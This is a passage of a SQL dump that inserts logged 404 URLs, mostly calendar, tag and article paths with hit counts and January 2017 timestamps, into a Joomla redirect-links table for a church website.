(2651, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/28/-', NULL, '', '', 1, 0, '2017-01-23 14:39:52', '0000-00-00 00:00:00', 301),
(2652, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/15/-', NULL, '', '', 1, 0, '2017-01-23 14:40:00', '0000-00-00 00:00:00', 301),
(2653, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/2/-', NULL, '', '', 1, 0, '2017-01-23 14:40:07', '0000-00-00 00:00:00', 301),
(2654, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/5/-', NULL, '', '', 1, 0, '2017-01-23 14:40:14', '0000-00-00 00:00:00', 301),
(2655, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/20/-', NULL, '', '', 1, 0, '2017-01-23 14:40:22', '0000-00-00 00:00:00', 301),
(2656, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/16/-', NULL, '', '', 1, 0, '2017-01-23 14:40:29', '0000-00-00 00:00:00', 301),
(2657, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/14/-', NULL, '', '', 1, 0, '2017-01-23 14:40:37', '0000-00-00 00:00:00', 301),
(2658, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/15/-', NULL, '', '', 1, 0, '2017-01-23 14:40:44', '0000-00-00 00:00:00', 301),
(2659, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/24/-', NULL, '', '', 1, 0, '2017-01-23 14:40:51', '0000-00-00 00:00:00', 301),
(2660, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/3/-', NULL, '', '', 1, 0, '2017-01-23 14:40:59', '0000-00-00 00:00:00', 301),
(2661, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/28/-', NULL, '', '', 1, 0, '2017-01-23 14:41:06', '0000-00-00 00:00:00', 301),
(2662, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/13/-', NULL, '', '', 1, 0, '2017-01-23 14:41:14', '0000-00-00 00:00:00', 301),
(2663, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/3/-', NULL, '', '', 1, 0, '2017-01-23 14:41:21', '0000-00-00 00:00:00', 301),
(2664, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/28/-', NULL, '', '', 1, 0, '2017-01-23 14:41:29', '0000-00-00 00:00:00', 301),
(2665, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/8/-', NULL, '', '', 1, 0, '2017-01-23 14:41:36', '0000-00-00 00:00:00', 301),
(2666, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/29/-', NULL, '', '', 1, 0, '2017-01-23 14:41:43', '0000-00-00 00:00:00', 301),
(2667, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/10/-', NULL, '', '', 1, 0, '2017-01-23 14:41:51', '0000-00-00 00:00:00', 301),
(2668, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/7/-', NULL, '', '', 1, 0, '2017-01-23 14:41:58', '0000-00-00 00:00:00', 301),
(2669, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/11/-', NULL, '', '', 1, 0, '2017-01-23 14:42:06', '0000-00-00 00:00:00', 301),
(2670, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/16/-', NULL, '', '', 1, 0, '2017-01-23 14:42:13', '0000-00-00 00:00:00', 301),
(2671, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/29/-', NULL, '', '', 1, 0, '2017-01-23 14:42:21', '0000-00-00 00:00:00', 301),
(2672, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/10/-', NULL, '', '', 1, 0, '2017-01-23 14:42:28', '0000-00-00 00:00:00', 301),
(2673, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/2/-', NULL, '', '', 1, 0, '2017-01-23 14:42:36', '0000-00-00 00:00:00', 301),
(2674, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/13/-', NULL, '', '', 1, 0, '2017-01-23 14:46:06', '0000-00-00 00:00:00', 301),
(2675, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Lighthouse&Itemid=626', NULL, '', '', 1, 0, '2017-01-23 14:47:39', '0000-00-00 00:00:00', 301),
(2676, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/26/-', NULL, '', '', 1, 0, '2017-01-23 14:49:54', '0000-00-00 00:00:00', 301),
(2677, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/16/-', NULL, '', '', 1, 0, '2017-01-23 14:53:40', '0000-00-00 00:00:00', 301),
(2678, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/23/-', NULL, '', '', 1, 0, '2017-01-23 14:57:28', '0000-00-00 00:00:00', 301),
(2679, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/3/-', NULL, '', '', 1, 0, '2017-01-23 15:01:19', '0000-00-00 00:00:00', 301),
(2680, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/26/-', NULL, '', '', 1, 0, '2017-01-23 15:05:04', '0000-00-00 00:00:00', 301),
(2681, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/12/-', NULL, '', '', 1, 0, '2017-01-23 15:08:50', '0000-00-00 00:00:00', 301),
(2682, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/27/-', NULL, '', '', 1, 0, '2017-01-23 15:12:37', '0000-00-00 00:00:00', 301),
(2683, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/7/-', NULL, '', '', 1, 0, '2017-01-23 15:16:22', '0000-00-00 00:00:00', 301),
(2684, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/2/-', NULL, '', '', 1, 0, '2017-01-23 15:20:09', '0000-00-00 00:00:00', 301),
(2685, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/22/-', NULL, '', '', 1, 0, '2017-01-23 15:23:56', '0000-00-00 00:00:00', 301),
(2686, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/7/-', NULL, '', '', 1, 0, '2017-01-23 15:27:43', '0000-00-00 00:00:00', 301),
(2687, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/itemlist/tag/Joomla', NULL, '', '', 1, 0, '2017-01-23 15:29:27', '0000-00-00 00:00:00', 301),
(2688, 'http://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/44-daughters-of-destiny', NULL, '', '', 10, 0, '2017-01-23 15:39:30', '0000-00-00 00:00:00', 301),
(2689, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/15', NULL, '', '', 6, 0, '2017-01-23 15:57:50', '0000-00-00 00:00:00', 301),
(2690, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=arrowthemes', NULL, '', '', 1, 0, '2017-01-23 16:03:30', '0000-00-00 00:00:00', 301),
(2691, 'http://www.lifeoasisinternationalchurch.org/index.php/262-day-2-of-21-days-fasting-and-prayer-november-2', NULL, '', '', 6, 0, '2017-01-23 16:10:59', '0000-00-00 00:00:00', 301),
(2692, 'http://www.lifeoasisinternationalchurch.org/index.php/269-day-9-of-21-days-fasting-and-prayer-november', NULL, '', '', 8, 0, '2017-01-23 16:40:10', '0000-00-00 00:00:00', 301),
(2693, 'http://www.lifeoasisinternationalchurch.org/PhotoGallery/', NULL, '', '', 1, 0, '2017-01-23 17:13:34', '0000-00-00 00:00:00', 301),
(2694, 'http://www.lifeoasisinternationalchurch.org/s', NULL, '', '', 14, 0, '2017-01-23 18:01:04', '0000-00-00 00:00:00', 301),
(2695, 'http://www.lifeoasisinternationalchurch.org/st', NULL, '', '', 15, 0, '2017-01-23 18:01:05', '0000-00-00 00:00:00', 301),
(2696, 'http://www.lifeoasisinternationalchurch.org/stre', NULL, '', '', 10, 0, '2017-01-23 18:01:06', '0000-00-00 00:00:00', 301),
(2697, 'http://www.lifeoasisinternationalchurch.org/str', NULL, '', '', 12, 0, '2017-01-23 18:01:06', '0000-00-00 00:00:00', 301),
(2698, 'http://www.lifeoasisinternationalchurch.org/strea', NULL, '', '', 11, 0, '2017-01-23 18:01:07', '0000-00-00 00:00:00', 301),
(2699, 'http://www.lifeoasisinternationalchurch.org/stream', NULL, '', '', 16, 0, '2017-01-23 18:01:07', '0000-00-00 00:00:00', 301),
(2700, 'http://www.lifeoasisinternationalchurch.org/streamin', NULL, '', '', 14, 0, '2017-01-23 18:01:08', '0000-00-00 00:00:00', 301),
(2701, 'http://www.lifeoasisinternationalchurch.org/streami', NULL, '', '', 8, 0, '2017-01-23 18:01:09', '0000-00-00 00:00:00', 301),
(2702, 'http://lifeoasisinternationalchurch.org/index.php/59-2014-1', NULL, '', '', 2, 0, '2017-01-23 20:01:33', '0000-00-00 00:00:00', 301),
(2703, 'http://www.lifeoasisinternationalchurch.org/template-info-2/the-church?page&print=1&tmpl=component', NULL, '', '', 1, 0, '2017-01-23 20:33:28', '0000-00-00 00:00:00', 301),
(2704, 'http://www.lifeoasisinternationalchurch.org/resources/blog/itemlist/category/', NULL, '', '', 1, 0, '2017-01-23 21:43:52', '0000-00-00 00:00:00', 301),
(2705, 'http://ljmti.lifeoasisinternationalchurch.org/online-giving/', NULL, '', '', 1, 0, '2017-01-23 23:40:33', '0000-00-00 00:00:00', 301),
(2706, 'http://lifeoasisinternationalchurch.org/index.php/264-day-4-of-21-days-fasting-and-prayer-november', NULL, '', '', 2, 0, '2017-01-24 00:09:49', '0000-00-00 00:00:00', 301),
(2707, 'http://ljmti.lifeoasisinternationalchurch.org/digital/live-streaming', NULL, '', '', 2, 0, '2017-01-24 00:40:36', '0000-00-00 00:00:00', 301),
(2708, 'http://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/14-sample-content-3', NULL, '', '', 3, 0, '2017-01-24 00:45:05', '0000-00-00 00:00:00', 301),
(2709, 'http://lifeoasisinternationalchurch.org/2-uncategorised/58-private', NULL, '', '', 4, 0, '2017-01-24 02:25:58', '0000-00-00 00:00:00', 301),
(2710, 'http://www.lifeoasisinternationalchurch.org/prayer/58-prophetic-words-for-day-6', NULL, '', '', 6, 0, '2017-01-24 02:45:31', '0000-00-00 00:00:00', 301),
(2711, 'http://lifeoasisinternationalchurch.org/freemp3', NULL, '', '', 1, 0, '2017-01-24 03:30:31', '0000-00-00 00:00:00', 301),
(2712, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 1, 0, '2017-01-24 04:01:42', '0000-00-00 00:00:00', 301),
(2713, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/13/-', NULL, '', '', 1, 0, '2017-01-24 04:02:58', '0000-00-00 00:00:00', 301),
(2714, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/19/-', NULL, '', '', 1, 0, '2017-01-24 04:03:03', '0000-00-00 00:00:00', 301),
(2715, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/4/-', NULL, '', '', 1, 0, '2017-01-24 04:03:16', '0000-00-00 00:00:00', 301),
(2716, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/10/-', NULL, '', '', 1, 0, '2017-01-24 04:03:23', '0000-00-00 00:00:00', 301),
(2717, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/2/-', NULL, '', '', 1, 0, '2017-01-24 04:03:30', '0000-00-00 00:00:00', 301),
(2718, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/22/-', NULL, '', '', 1, 0, '2017-01-24 04:03:43', '0000-00-00 00:00:00', 301),
(2719, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/5/-', NULL, '', '', 1, 0, '2017-01-24 04:03:50', '0000-00-00 00:00:00', 301),
(2720, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/4/-', NULL, '', '', 1, 0, '2017-01-24 04:03:56', '0000-00-00 00:00:00', 301),
(2721, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/31/-', NULL, '', '', 1, 0, '2017-01-24 04:04:03', '0000-00-00 00:00:00', 301),
(2722, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/30/-', NULL, '', '', 1, 0, '2017-01-24 04:04:10', '0000-00-00 00:00:00', 301),
(2723, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/24/-', NULL, '', '', 1, 0, '2017-01-24 04:04:16', '0000-00-00 00:00:00', 301),
(2724, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/10/-', NULL, '', '', 1, 0, '2017-01-24 04:04:23', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(2725, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/25/-', NULL, '', '', 1, 0, '2017-01-24 04:04:30', '0000-00-00 00:00:00', 301),
(2726, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/15/-', NULL, '', '', 1, 0, '2017-01-24 04:04:36', '0000-00-00 00:00:00', 301),
(2727, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/31/-', NULL, '', '', 1, 0, '2017-01-24 04:04:43', '0000-00-00 00:00:00', 301),
(2728, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/22/-', NULL, '', '', 1, 0, '2017-01-24 04:04:50', '0000-00-00 00:00:00', 301),
(2729, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/4/-', NULL, '', '', 1, 0, '2017-01-24 04:04:56', '0000-00-00 00:00:00', 301),
(2730, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/1/-', NULL, '', '', 1, 0, '2017-01-24 04:05:03', '0000-00-00 00:00:00', 301),
(2731, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/29/-', NULL, '', '', 1, 0, '2017-01-24 04:05:10', '0000-00-00 00:00:00', 301),
(2732, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/18/-', NULL, '', '', 1, 0, '2017-01-24 04:05:16', '0000-00-00 00:00:00', 301),
(2733, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/1/-', NULL, '', '', 1, 0, '2017-01-24 04:05:23', '0000-00-00 00:00:00', 301),
(2734, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/6/-', NULL, '', '', 1, 0, '2017-01-24 04:05:30', '0000-00-00 00:00:00', 301),
(2735, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/28/-', NULL, '', '', 1, 0, '2017-01-24 04:05:36', '0000-00-00 00:00:00', 301),
(2736, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/21/-', NULL, '', '', 1, 0, '2017-01-24 04:05:43', '0000-00-00 00:00:00', 301),
(2737, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/17/-', NULL, '', '', 1, 0, '2017-01-24 04:05:50', '0000-00-00 00:00:00', 301),
(2738, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/14/-', NULL, '', '', 1, 0, '2017-01-24 04:05:56', '0000-00-00 00:00:00', 301),
(2739, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/14/-', NULL, '', '', 1, 0, '2017-01-24 04:06:03', '0000-00-00 00:00:00', 301),
(2740, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/11/-', NULL, '', '', 1, 0, '2017-01-24 04:06:10', '0000-00-00 00:00:00', 301),
(2741, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/17/-', NULL, '', '', 1, 0, '2017-01-24 04:06:16', '0000-00-00 00:00:00', 301),
(2742, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/22/-', NULL, '', '', 1, 0, '2017-01-24 04:06:23', '0000-00-00 00:00:00', 301),
(2743, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/5/-', NULL, '', '', 1, 0, '2017-01-24 04:06:30', '0000-00-00 00:00:00', 301),
(2744, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/19/-', NULL, '', '', 1, 0, '2017-01-24 04:06:36', '0000-00-00 00:00:00', 301),
(2745, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/18/-', NULL, '', '', 1, 0, '2017-01-24 04:06:43', '0000-00-00 00:00:00', 301),
(2746, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/5/-', NULL, '', '', 1, 0, '2017-01-24 04:06:50', '0000-00-00 00:00:00', 301),
(2747, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/11/-', NULL, '', '', 1, 0, '2017-01-24 04:06:56', '0000-00-00 00:00:00', 301),
(2748, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/26/-', NULL, '', '', 1, 0, '2017-01-24 04:07:03', '0000-00-00 00:00:00', 301),
(2749, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/9/-', NULL, '', '', 1, 0, '2017-01-24 04:07:10', '0000-00-00 00:00:00', 301),
(2750, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/10/28/-', NULL, '', '', 1, 0, '2017-01-24 04:07:16', '0000-00-00 00:00:00', 301),
(2751, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/7/-', NULL, '', '', 1, 0, '2017-01-24 04:07:23', '0000-00-00 00:00:00', 301),
(2752, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/4/-', NULL, '', '', 1, 0, '2017-01-24 04:07:30', '0000-00-00 00:00:00', 301),
(2753, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/23/-', NULL, '', '', 1, 0, '2017-01-24 04:07:37', '0000-00-00 00:00:00', 301),
(2754, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/12/4/-', NULL, '', '', 1, 0, '2017-01-24 04:07:44', '0000-00-00 00:00:00', 301),
(2755, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/28/-', NULL, '', '', 1, 0, '2017-01-24 04:07:52', '0000-00-00 00:00:00', 301),
(2756, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/arrowthemes', NULL, '', '', 1, 0, '2017-01-24 04:46:11', '0000-00-00 00:00:00', 301),
(2757, 'http://www.lifeoasisinternationalchurch.org/12-sample-content/14-sample-content-3', NULL, '', '', 6, 0, '2017-01-24 04:59:17', '0000-00-00 00:00:00', 301),
(2758, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/25638', NULL, '', '', 1, 0, '2017-01-24 05:25:58', '0000-00-00 00:00:00', 301),
(2759, 'http://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;Itemid=622&amp;month=2&amp;year=2017&amp;task=calendar', NULL, '', '', 2, 0, '2017-01-24 05:28:09', '0000-00-00 00:00:00', 301),
(2760, 'http://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;Itemid=622&amp;month=12&amp;year=2016&amp;task=calendar', NULL, '', '', 1, 0, '2017-01-24 05:28:27', '0000-00-00 00:00:00', 301),
(2761, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/01/15', NULL, '', '', 8, 0, '2017-01-24 06:15:47', '0000-00-00 00:00:00', 301),
(2762, 'http://www.lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/10/31/-', NULL, '', '', 2, 0, '2017-01-24 07:51:59', '0000-00-00 00:00:00', 301),
(2763, 'http://lifeoasisinternationalchurch.org/132-2014-3', NULL, '', '', 2, 0, '2017-01-24 08:04:32', '0000-00-00 00:00:00', 301),
(2764, 'http://lifeoasisinternationalchurch.org/11-demo-articles/10-preset-styles', NULL, '', '', 2, 0, '2017-01-24 08:04:32', '0000-00-00 00:00:00', 301),
(2765, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=theme&Itemid=770', NULL, '', '', 1, 0, '2017-01-24 08:59:37', '0000-00-00 00:00:00', 301),
(2766, 'http://lifeoasisinternationalchurch.org/12-sample-content/14-sample-content-3', NULL, '', '', 3, 0, '2017-01-24 09:45:33', '0000-00-00 00:00:00', 301),
(2767, 'http://www.lifeoasisinternationalchurch.org/loic-forum/14-contact-us', NULL, '', '', 5, 0, '2017-01-24 09:56:48', '0000-00-00 00:00:00', 301),
(2768, 'http://lifeoasisinternationalchurch.org/resources/stream/18-loic/50-young-achievers', NULL, '', '', 8, 0, '2017-01-24 10:26:59', '0000-00-00 00:00:00', 301),
(2769, 'http://lifeoasisinternationalchurch.org/database.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-24 10:46:28', '0000-00-00 00:00:00', 301),
(2770, 'http://lifeoasisinternationalchurch.org/include.class.php', NULL, 'lifeoasisinternationalchurch.org', '', 4, 0, '2017-01-24 10:48:50', '0000-00-00 00:00:00', 301),
(2771, 'http://lifeoasisinternationalchurch.org/index_old.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-01-24 10:56:30', '0000-00-00 00:00:00', 301),
(2772, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-36a13264b58e64b0f24eb5b4ffab8cc5.php', NULL, '', '', 21, 0, '2017-01-24 11:01:35', '0000-00-00 00:00:00', 301),
(2773, 'http://lifeoasisinternationalchurch.org/index.php/12-sample-content/14-sample-content-3', NULL, '', '', 1, 0, '2017-01-24 11:12:29', '0000-00-00 00:00:00', 301),
(2774, 'http://www.lifeoasisinternationalchurch.org/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 3, 0, '2017-01-24 11:17:43', '0000-00-00 00:00:00', 301),
(2775, 'http://www.lifeoasisinternationalchurch.org/resources/zion-pillar/14-contact-us', NULL, '', '', 2, 0, '2017-01-24 11:28:10', '0000-00-00 00:00:00', 301),
(2776, 'http://www.lifeoasisinternationalchurch.org/resources/kindom-builder/14-contact-us', NULL, '', '', 1, 0, '2017-01-24 11:47:30', '0000-00-00 00:00:00', 301),
(2777, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/14-prayer-a-fasting-day-5', NULL, '', '', 3, 0, '2017-01-24 12:03:09', '0000-00-00 00:00:00', 301),
(2778, 'http://lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/14-sample-content-3', NULL, '', '', 1, 0, '2017-01-24 12:30:59', '0000-00-00 00:00:00', 301),
(2779, 'http://lifeoasisinternationalchurch.org/amazon-store', NULL, '', '', 1, 0, '2017-01-24 12:35:47', '0000-00-00 00:00:00', 301),
(2780, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/captcha/47602', NULL, '', '', 1, 0, '2017-01-24 12:51:48', '0000-00-00 00:00:00', 301),
(2781, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/22/-', NULL, '', '', 1, 0, '2017-01-24 13:33:03', '0000-00-00 00:00:00', 301),
(2782, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/2/5/-', NULL, '', '', 1, 0, '2017-01-24 13:33:13', '0000-00-00 00:00:00', 301),
(2783, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/28/-', NULL, '', '', 1, 0, '2017-01-24 13:33:24', '0000-00-00 00:00:00', 301),
(2784, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/10/-', NULL, '', '', 1, 0, '2017-01-24 13:33:36', '0000-00-00 00:00:00', 301),
(2785, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2037/11/4/-', NULL, '', '', 1, 0, '2017-01-24 13:33:47', '0000-00-00 00:00:00', 301),
(2786, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/1/-', NULL, '', '', 1, 0, '2017-01-24 13:33:59', '0000-00-00 00:00:00', 301),
(2787, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/1/-', NULL, '', '', 1, 0, '2017-01-24 13:34:11', '0000-00-00 00:00:00', 301),
(2788, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/9/-', NULL, '', '', 1, 0, '2017-01-24 13:34:31', '0000-00-00 00:00:00', 301),
(2789, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/21/-', NULL, '', '', 1, 0, '2017-01-24 13:34:41', '0000-00-00 00:00:00', 301),
(2790, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/5/6/-', NULL, '', '', 1, 0, '2017-01-24 13:34:52', '0000-00-00 00:00:00', 301),
(2791, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/29/-', NULL, '', '', 1, 0, '2017-01-24 13:35:03', '0000-00-00 00:00:00', 301),
(2792, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/4/4/-', NULL, '', '', 1, 0, '2017-01-24 13:35:14', '0000-00-00 00:00:00', 301),
(2793, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/17/-', NULL, '', '', 1, 0, '2017-01-24 13:35:25', '0000-00-00 00:00:00', 301),
(2794, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/8/-', NULL, '', '', 1, 0, '2017-01-24 13:35:36', '0000-00-00 00:00:00', 301),
(2795, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/30/-', NULL, '', '', 1, 0, '2017-01-24 13:35:47', '0000-00-00 00:00:00', 301),
(2796, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/8/31/-', NULL, '', '', 1, 0, '2017-01-24 13:35:57', '0000-00-00 00:00:00', 301),
(2797, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/30/-', NULL, '', '', 1, 0, '2017-01-24 13:36:08', '0000-00-00 00:00:00', 301),
(2798, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2032/6/18/-', NULL, '', '', 1, 0, '2017-01-24 13:36:19', '0000-00-00 00:00:00', 301),
(2799, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/12/-', NULL, '', '', 1, 0, '2017-01-24 13:36:30', '0000-00-00 00:00:00', 301),
(2800, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2033/7/15/-', NULL, '', '', 1, 0, '2017-01-24 13:36:41', '0000-00-00 00:00:00', 301),
(2801, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2036/1/16/-', NULL, '', '', 1, 0, '2017-01-24 13:36:52', '0000-00-00 00:00:00', 301),
(2802, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/12/19/-', NULL, '', '', 1, 0, '2017-01-24 13:37:03', '0000-00-00 00:00:00', 301),
(2803, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2002/8/27/-', NULL, '', '', 1, 0, '2017-01-24 13:37:14', '0000-00-00 00:00:00', 301),
(2804, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2034/3/1/-', NULL, '', '', 1, 0, '2017-01-24 13:37:25', '0000-00-00 00:00:00', 301),
(2805, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/9/8/-', NULL, '', '', 1, 0, '2017-01-24 13:37:37', '0000-00-00 00:00:00', 301),
(2806, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2031/5/21/-', NULL, '', '', 1, 0, '2017-01-24 13:37:50', '0000-00-00 00:00:00', 301),
(2807, 'http://lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 3, 0, '2017-01-24 14:37:42', '0000-00-00 00:00:00', 301),
(2808, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2012/01/11/-', NULL, '', '', 1, 0, '2017-01-24 15:22:39', '0000-00-00 00:00:00', 301),
(2809, 'http://lifeoasisinternationalchurch.org/resources/blo', NULL, '', '', 7, 0, '2017-01-24 18:15:04', '0000-00-00 00:00:00', 301),
